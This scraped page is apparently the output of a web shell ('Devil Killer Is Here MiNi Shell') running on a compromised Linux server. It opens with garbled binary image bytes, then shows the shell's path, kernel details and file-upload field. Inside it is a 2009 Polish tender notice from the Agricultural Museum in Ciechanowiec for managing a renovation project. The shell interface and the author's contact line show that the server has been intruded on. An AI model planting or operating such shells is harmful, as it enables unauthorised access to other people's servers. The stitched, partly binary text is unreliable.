JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090910/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090910/314248-N-2009.html

<p class="kh_header"><b>Ciechanowiec: Zarządzanie zintegrowanym projektem rozwoju infrastruktury technicznej i ekspozycyjnej Muzeum Rolnictwa w Ciechanowcu - modułem 1</b><br>
<b>Numer ogłoszenia: 314248 - 2009; data zamieszczenia: 10.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Rolnictwa im. ks. Krzysztofa Kluka w Ciechanowcu , ul. Pałacowa 5, 18-230 Ciechanowiec, woj. podlaskie, tel. 086 2771328, faks 086 2771328.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeumrolnictwa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zarządzanie zintegrowanym projektem rozwoju infrastruktury technicznej i ekspozycyjnej Muzeum Rolnictwa w Ciechanowcu - modułem 1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi w zakresie zarządzania zintegrowanym projektem rozwoju infrastruktury technicznej i ekspozycyjnej Muzeum Rolnictwa w Ciechanowcu - modułem 1 dofinansowywanym w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego obejmującym realizację inwestycji polegającej na:
- przeniesieniu na teren skansenu kościoła i dzwonnicy z Bogut,
- przeniesieniu na teren skansenu wikarówki z Kuleszy Kościelnych,
- remoncie leśniczówki i stróżówki,
- remoncie dachów obiektów: Dworu z Siemion, spichlerza z Rudki, lamusa z Rudy, młyna wodnego i chałupy z Dąbrowy,
- remoncie kotłów c.o. w pałacu Starzeńskich,
- remoncie instalacji odgromowej na terenie skansenu.
Przedmiot zamówienia obejmuje:
a) wykonanie zadań w zakresie zarządzania projektem:
-  	sprawowanie całościowego nadzoru nad realizacją projektu,
- 	zapewnianie terminowej realizacji działań zgodnie z harmonogramem projektu oraz koordynowanie tych działań,
- prowadzenie dokumentacji projektu zgodnie z zasadami Regionalnego Programu Operacyjnego Województwa Podlaskiego,
-  	dokonywanie systematycznej kontroli i oceny postępów w realizacji projektu oraz uzyskanych efektów,  
- 	opracowywanie planów i sprawozdań związanych z realizacją zadania,
- 	kontakt z instytucją Zarządzającą Regionalnym Programem Operacyjnym Województwa Podlaskiego oraz organizacjami zaangażowanymi bezpośrednio lub pośrednio przy realizacji projektu, 
-	prowadzenie systematycznego monitoringu realizacji projektu oraz prowadzenie sprawozdawczości projektu zgodnie z terminami składania sprawozdań (kontrola terminów ich składania) i w oparciu o obowiązujące zapisy w dokumentach dotyczących Regionalnego Programu Operacyjnego Województwa Podlaskiego,
b) wykonanie zadań w zakresie obsługi finansowej projektu:
- 	sprawowanie nadzoru nad przepływem środków finansowych związanych z realizacją projektu oraz przygotowywanie wniosków o płatność,
- 	monitorowanie postępu finansowego projektu dotyczącego wydatków w zakresie zgodności 
z harmonogramem płatności i budżetem projektu,
- 	prawidłowe oznaczenie i opisywanie dokumentów księgowych przetwarzanych przy realizacji projektu,
-	prowadzenie monitoringu płynności finansowej w ramach realizacji projektu z uwzględnieniem wszystkich źródeł finansowania,
-	sporządzanie zestawień dokumentów rozliczeniowych przedstawiających wykorzystanie środków realizowanego projektu,
-	wstępna weryfikacja faktur pod względem formalno - rachunkowym i prawidłowości rozliczeń finansowych w ramach projektu,
- 	nadzór nad płatnościami dla Wykonawcami,
- 	prawidłowe rozliczenie finansowe projektu i przygotowanie wymaganych sprawozdań do właściwej Instytucji Zarządzającej,
c) wykonanie zadań w zakresie zamówień publicznych:
- 	zapewnienie stosowania przepisów ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 r. (t. j. Dz. U. z 2007 r. Nr 223, poz. 1655 z późniejszymi zmianami) a także innych obowiązujących przepisów prawa niezbędnych do realizacji zamówień w ramach projektu,
- 	przygotowywanie w uzgodnieniu z Zamawiającym ogłoszeń o przetargach i specyfikacji istotnych warunków zamówienia łącznie z projektami umów,
- 	prowadzenie korespondencji dotyczącej procedur zamówień publicznych z firmami i podmiotami zaangażowanymi w realizację zadań projektowych,
- 	realizacja procedur zamówień publicznych zgodnie z ustawą Prawo zamówień publicznych,
- 	dokumentowanie postępowań o udzielenie zamówień publicznych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 2.500,00 zł (słownie: dwa tysiące pięćset złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1. 	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2. 	posiadają niezbędną wiedzę i doświadczenie zawodowe - w szczególności Wykonawca, jeżeli wykonuje zamówienie osobiście lub pracownik Wykonawcy jeżeli w imieniu Wykonawcy będzie wykonywał zamówienie, muszą posiadać:
a)	wykształcenie co najmniej wyższe ekonomiczne lub studia podyplomowe w zakresie rachunkowości i finansów,
b)	co najmniej pięcioletnie doświadczenie we współpracy z instytucjami finansów publicznych 
w przygotowaniu bądź realizowaniu projektów infrastrukturalnych dofinansowanych ze środków pomocowych UE.
c)	minimum dwa zrealizowane zlecenia w zakresie monitoringu i ewaluacji projektów współfinansowanych ze środków pomocowych UE,
d)	co najmniej jedno zrealizowane zlecenie w zakresie zarządzania projektem inwestycyjnym 
w zakresie dziedzictwa kulturowego współfinansowanym ze środków pomocowych UE.
4. 	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
5. 	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust.1 i 2 Pzp., 
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą: spełnia - nie spełnia, w oparciu informacje zawarte w dokumentach wyszczególnionych w rozdziale VI niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił. 
Niespełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełnienia warunków udziału w postępowaniu oferta musi zawierać następujące dokumenty:
1)	ofertę sporządzoną na formularzu załączonym do niniejszej Specyfikacji (załącznik nr 1),
2) 	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu lub zgłoszenia do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
3)	oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 3),
4) 	wykaz pracowników (pracownika) Wykonawcy, przy pomocy którego Wykonawca wykonywać będzie zamówienie wraz z dokumentami potwierdzającymi kwalifikacje (załącznik nr 4),
5) 	kserokopia dyplomu ukończenia studiów wyższych ekonomicznych lub studiów podyplomowych 
w zakresie rachunkowości i finansów, 
6)	zestawienie przykładów współpracy z instytucjami finansów publicznych dotyczącej przygotowania bądź realizowania projektów infrastrukturalnych dofinansowanych ze środków pomocowych UE 
w okresie od co najmniej 2004 r. 
7) 	wykaz minimum dwóch zrealizowanych prac w zakresie monitoringu i ewaluacji projektów współfinansowanych ze środków pomocowych UE oraz załączone dokumenty potwierdzające należyte wykonanie wykazanych usług (załącznik nr 5), 
8)	wykaz co najmniej jednego zrealizowanego zlecenia w zakresie zarządzania projektem inwestycyjnym w zakresie dziedzictwa kulturowego współfinansowanym ze środków pomocowych UE oraz załączone dokumenty potwierdzające należyte wykonanie wykazanej usługi (załącznik nr 5),
9)	aktualną informację z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie  określonym art. 24 ust. 1 pkt. od 4 do 8 (pkt 9 w przypadku podmiotów zbiorowych) ustawy PZP wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
10)	pełnomocnictwo udzielane osobom podpisującym ofertę, o ile prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego,
Uwaga: dokumenty wymienione w rozdz. VI ust. 1 pkt. 2 i 9 należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę, natomiast oświadczenie o spełnianiu warunków udziału w postępowaniu wymienione w pkt. 3  oraz pełnomocnictwo, o którym mowa 
w pkt 10 w formie oryginału.
2. 	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 1 pkt 2, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. 	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sadowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Przepis ust. 2 stosuje się odpowiednio.
4.	Dokumenty, o których mowa w ust. 2, 3 niniejszego rozdziału należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez osobę upoważnioną do reprezentowania Wykonawcy. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez osobę uprawnioną do reprezentowania Wykonawcy.
5. 	W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia:
1)	dokumenty wymienione w rozdz. VI ust. 1 pkt. 2, 3, 5, 6, 7, 8 składa każdy z wykonawców oddzielnie,
2) 	do oferty musi być załączony dokument ustanawiający pełnomocnika Wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania 
w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.muzeumrolnictwa.pl/przetargi.html.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Rolnictwa im. ks. Krzysztofa Kluka w Ciechanowcu, ul. Pałacowa 5, 
18-230 Ciechanowiec.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.09.2009 godzina 11:00, miejsce: Sekretariat Muzeum Rolnictwa im. ks. Krzysztofa Kluka w Ciechanowcu, ul. Pałacowa 5, 18-230 Ciechanowiec.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com